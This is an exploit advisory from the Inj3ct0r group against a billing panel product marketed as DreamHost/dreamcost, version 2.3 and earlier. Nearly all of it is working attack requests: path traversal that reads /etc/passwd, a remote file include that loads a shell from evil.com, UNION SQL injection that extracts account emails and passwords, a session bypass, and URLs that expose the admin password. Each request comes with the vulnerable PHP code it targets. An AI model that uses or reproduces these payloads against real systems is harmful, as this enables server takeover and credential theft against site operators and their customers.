================================================= DreamHost <= && > 2.3 global inj3ct0r.com Exploit ================================================= 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 0 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1 #[+] Discovered By : Inj3ct0r #[+] Site : Inj3ct0r.com #[+] support e-mail : submit[at]inj3ct0r.com #[+] visit : inj3ct0r.com , inj3ct0r.org , inj3ct0r.net Decided to make a review to DreamHost - Billing Panel Site product: dreamcost.com Version: <= && > 2.3 ---------------------------------------------------------------- Local Include Exploit: /members.php?page=/../../../../../../../../../../etc/passwd%00 Vulnerable code: // member_template.html ----------------------------------------------------------------- Remote Include Exploit: /admin/?page=http://evil.com/shell.php? Vulnerable code: // /admin/template.html include("$page$page_ext"); ------------------------------------------------------------------ Sql Inj3ct0r Exploit: members.php?page=orders_view&order_id=-1'+UNION+SELECT+concat_ws(0x3,account_email,accoun t_password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28+FROM+account+WH ERE+account_id=1%20--%20&session_id=you session_id and members.php?page=orders_view&order_id=-1'+UNION+SELECT+concat_ws(0x3,account_email,accoun t_password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28+FROM+account+WH ERE+account_id=1%20--%20&session_id=-1'+OR+login_logged=0x59%20--%20 Vulnerable code: // member_orders_view.html $db = new ps_DB; $q = "SELECT * FROM orders WHERE order_id='$order_id' AND order_account_id='$account_id' ORDER BY order_id"; ------------------------------------------------------------- Admin Login: members.php?Page=static&content=login Admin Password: members.php?Page=static&content=password Path: members.php?Page=static&content=path Vulnerable code: // member_static.thml // functions.php function setup($field) { $db = new ps_DB; $q = "SELECT setup_$field FROM setup WHERE setup_id='1'"; $db->query($q); $db->next_record(); $ret = $db->f("setup_$field"); return $ret; } $db->query($q); ------------------------------------------------------------- SQL-Inj3ct0r entry under randomly Account members.php?page=account&session_id=-1'+OR+login_logged=0x59%20-%20 Vulnerable code: // member_account.html $pass = is_logged($session_id); // functions.php function is_logged($session_id) { $db = new ps_DB; $q = "SELECT * FROM login WHERE login_id = '$session_id'"; $db->query($q); $db->next_record(); $ret = $db->f("login_logged"); return $ret; } -------------------------------------------------------------- Xss Exploit: /members.php?page=static&content= --------------------------------- ThE End =] Visit my proj3ct : http://inj3ct0r.com http://inj3ct0r.org http://inj3ct0r.net # ~ - [ [ : Inj3ct0r : ] ]